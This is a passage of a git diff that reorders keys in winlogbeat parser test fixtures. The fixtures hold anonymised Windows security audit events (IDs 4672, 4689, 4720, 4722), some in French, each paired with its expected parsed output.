:\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}" + } }, "expected": { "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte 
:\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", diff --git a/Beats/winlogbeat/tests/security_event_4689.json b/Beats/winlogbeat/tests/security_event_4689.json index e5beffcf5..22840d53c 100644 --- a/Beats/winlogbeat/tests/security_event_4689.json +++ b/Beats/winlogbeat/tests/security_event_4689.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin 
:\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}" + } }, "expected": { "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le 
processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", diff --git a/Beats/winlogbeat/tests/security_event_4720.json b/Beats/winlogbeat/tests/security_event_4720.json index 96e08b538..03a0543f5 100644 --- a/Beats/winlogbeat/tests/security_event_4720.json +++ b/Beats/winlogbeat/tests/security_event_4720.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Win
dows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD 
Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}" + } }, "expected": { "message": 
"{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Aud
it Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", diff --git a/Beats/winlogbeat/tests/security_event_4722.json b/Beats/winlogbeat/tests/security_event_4722.json index 94bd16fdf..99debf8cf 100644 --- a/Beats/winlogbeat/tests/security_event_4722.json +++ b/Beats/winlogbeat/tests/security_event_4722.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was 
enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + } }, "expected": { "message": 
